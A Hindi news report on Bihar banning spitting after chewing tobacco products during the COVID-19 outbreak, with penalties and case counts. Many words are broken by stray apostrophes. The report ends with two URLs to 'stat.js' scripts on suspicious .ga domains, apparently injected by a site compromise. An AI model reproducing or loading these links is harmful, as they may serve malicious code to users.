बिहार में पान-मसा’ला या गु’टखा-तं’बाकू खाकर इधर-उधर थू’कने वालों पर जु’र्माना लगेगा। स्वास्थ्य एवं परिवार कल्याण मंत्रालय और इंडियन काउंसिल ऑफ मेडिकल रिसर्च (आइसीएमआर) की अपील के बाद बिहार सरकार ने धुआं रहित तं’बाकू पदार्थ जैसे पान मसाला, तं’बाकू खा कर इधर-उधर थू’कने पर पूरी तरह से प्र’तिबंध लगा दिया है। केंद्र की हि’दायत के बाद राज्य के स्वास्थ्य विभाग ने इस संबंध में आ’देश जा’री कर दिया है। सोमवार की देर शाम आ’देश जा’री होने के बाद मंगलवार से इस पर मॉनीटिरिंग भी शुरू हो गई है। सूत्रों ने बताया कि जिस तरह सं’क्रमण का दायरा बढ़ता जा रहा है, ऐसे में अब खै’नी-पान मसाला खाकर थू’कने वालों पर एक्‍शन जरूरी हो गया है।

स्वास्थ विभाग के प्रधान सचिव संजय कुमार ने सोमवार को यहां जा’री आ’देश में कहा है कि केंद्र की सलाह के बाद राज्य सरकार ने भारतीय दंड संहिता की धारा 268/ 269 के तहत गु’टका, खै’नी व अन्य धुआं रहित तं’बाकू पदार्थ खाकर थू’कने वालों को दं’डित करने का फै’सला लिया है। ऐसा करते पकड़े जाने पर दो’षी को छह महीने की जेल और 200 रुपए का जु’र्माना भरना होगा। उन्होंने कहा कि राज्य में सि’गरेट एवं अन्य तं’बाकू उत्पादन अधिनियम के तहत सभी सार्वजनिक स्थलों पर धू’मपान पहले से प्रतिबं’धित है यदि प्रतिबं’धित स्थलों पर धू’मपान निषेध का उल्लं’घन होता है पकड़े जाने पर 200 रुपए का जु’र्माना लिया जाएगा।

गौरतलब है कि बिहार में सोमवार को एक और पॉजिटिव केस मिला है। इससे बिहार में को’रोना सं’क्रमित मरीजों की संख्‍या 64 से बढ़कर 65 हो गई है। सोमवार को मिलने वाला मरीज बेगूसराय का है। बेगूसराय में अब तक आठ लोग पॉजिटिव मिले हैं। सबसे ज्‍यादा मरीज बिहार के सिवान जिले में मिले हैं। सिवान और बेगूसराय के कई इलाकों को हॉट स्‍पाॅट घो’षित कर दिया है। दोनों जिलों को सी’ल कर दिया गया है। चप्‍पे-चप्‍पे को सेनेटाइज किया जा रहा है। हर जगह पर बारीक नजर रखी जा रही है। हालांकि, सुखद पहलु यह है कि 65 में से 24 मरीज ठीक हो गए हैं। वहीं, सरकार बार-बार लोगों से लॉकडाउन का पालन करने पर जोर दे रही है। मुख्‍यमंत्री नीतीश कुमार खुद इस मामले की मॉनीटरिंग कर रहे हैं।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms